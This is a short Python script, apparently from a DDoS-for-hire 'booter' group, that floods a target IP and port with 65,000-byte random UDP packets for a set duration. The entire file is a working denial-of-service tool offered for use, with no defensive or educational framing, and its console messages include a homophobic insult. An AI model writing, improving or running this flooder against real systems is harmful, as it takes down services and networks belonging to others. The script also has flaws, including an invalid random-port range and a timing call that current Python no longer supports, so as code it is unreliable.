#!/usr/bin/python

#UDP MIX by Booter.Team
#Discord: vbrxmr#7852


import socket,random,sys,time



if len(sys.argv)==1:
    print('')
    print(' Dude im calling the cops because ur ddosing')
    print('     Discord: vbrxmr#7852 ')
    print('')
    sys.exit('Syntax: ./udpmix 127.0.0.1 80 300')



def udp_socket_extention():

    port = int(sys.argv[2])

    randport=(True,False)[port==0]

    ip = sys.argv[1]

    dur = int(sys.argv[3])

    clock=(lambda:0,time.clock)[dur>0]

    duration=(1,(clock()+dur))[dur>0]
	
    print('')
    print('\033[91m DUDE IM CALLING THE COPS')
    print('\033[92m YOU ARE A DDOSING SKID')
    print('\033[91m YOU ARE SO GAY FOR HITTINH ME')
    print('\033[0m')
	
	
    sock=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)

    bytes=random._urandom(65000)

    while True:

        port=(random.randint(1,15000000),port)[randport]

        if clock()<duration:

            sock.sendto(bytes,(ip,port))

        else:

            break

    

udp_socket_extention()
